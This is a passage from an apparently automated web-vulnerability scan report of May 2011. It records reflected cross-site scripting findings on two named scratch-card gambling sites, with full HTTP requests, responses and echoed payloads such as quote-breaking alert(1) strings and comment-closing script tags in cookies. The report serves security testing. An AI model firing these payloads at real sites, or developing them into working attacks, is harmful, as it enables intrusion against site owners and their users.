...[SNIP]...

3.92. http://home.okscratchcards.com/Terms.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ebe8"-alert(1)-"bda4796c29a was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM4ebe8"-alert(1)-"bda4796c29a; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: BO=FM4ebe8"-alert(1)-"bda4796c29a; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:19:26 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97835


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4ebe8"-alert(1)-"bda4796c29a";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.93. http://home.okscratchcards.com/Terms.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25b68"-alert(1)-"b52c242e1ba was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM25b68"-alert(1)-"b52c242e1ba; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM25b68"-alert(1)-"b52c242e1ba; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:04 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97835


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM25b68"-alert(1)-"b52c242e1ba";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.94. http://home.okscratchcards.com/help.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f790"-alert(1)-"75a755f3e70 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM7f790"-alert(1)-"75a755f3e70; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: BO=FM7f790"-alert(1)-"75a755f3e70; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:17 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7f790"-alert(1)-"75a755f3e70";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.95. http://home.okscratchcards.com/help.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af511"-alert(1)-"3a9f6fdf6e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMaf511"-alert(1)-"3a9f6fdf6e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMaf511"-alert(1)-"3a9f6fdf6e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMaf511"-alert(1)-"3a9f6fdf6e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.96. http://okscratchcards.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://okscratchcards.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70343'-alert(1)-'89d3bb43680 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?70343'-alert(1)-'89d3bb43680=1 HTTP/1.1
Host: okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 16 May 2011 11:40:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.okscratchcards.com/?70343'-alert(1)-'89d3bb43680=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12560


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&70343'-alert(1)-'89d3bb43680=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.97. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e45f0"%3balert(1)//7fd470c036e was submitted in the ARC cookie. This input was echoed as e45f0";alert(1)//7fd470c036e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e45f0"%3balert(1)//7fd470c036e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137e45f0%22%3Balert%281%29%2F%2F7fd470c036e; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137e45f0";alert(1)//7fd470c036e' border='0' width='1' height='1'>
...[SNIP]...

3.98. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload e4f61--><script>alert(1)</script>89a53cc69f9 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e4f61--><script>alert(1)</script>89a53cc69f9; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137e4f61%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E89a53cc69f9; expires=Tue, 15-May-2012 12:38:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137e4f61--><script>alert(1)</script>89a53cc69f9">
...[SNIP]...

3.99. http://primescratchcards.com/images/HelpDepositMethods.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/HelpDepositMethods.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48d54'%3balert(1)//d85284f838d was submitted in the ARC cookie. This input was echoed as 48d54';alert(1)//d85284f838d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013748d54'%3balert(1)//d85284f838d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013748d54%27%3Balert%281%29%2F%2Fd85284f838d; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013748d54';alert(1)//d85284f838d&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.100. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b048'%3balert(1)//c701db3fcc6 was submitted in the ARC cookie. This input was echoed as 7b048';alert(1)//c701db3fcc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377b048'%3balert(1)//c701db3fcc6; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301377b048%27%3Balert%281%29%2F%2Fc701db3fcc6; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301377b048';alert(1)//c701db3fcc6&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.101. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload ad971--><script>alert(1)</script>f13763517ed was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ad971--><script>alert(1)</script>f13763517ed; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137ad971%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef13763517ed; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137ad971--><script>alert(1)</script>f13763517ed">
...[SNIP]...

3.102. http://primescratchcards.com/images/InviteFriend.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/InviteFriend.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f1e"%3balert(1)//469e8a0b361 was submitted in the ARC cookie. This input was echoed as d5f1e";alert(1)//469e8a0b361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/InviteFriend.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d5f1e"%3balert(1)//469e8a0b361; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137d5f1e%22%3Balert%281%29%2F%2F469e8a0b361; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137d5f1e";alert(1)//469e8a0b361' border='0' width='1' height='1'>
...[SNIP]...

3.103. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38b11"%3balert(1)//4b7eb4d38ea was submitted in the ARC cookie. This input was echoed as 38b11";alert(1)//4b7eb4d38ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
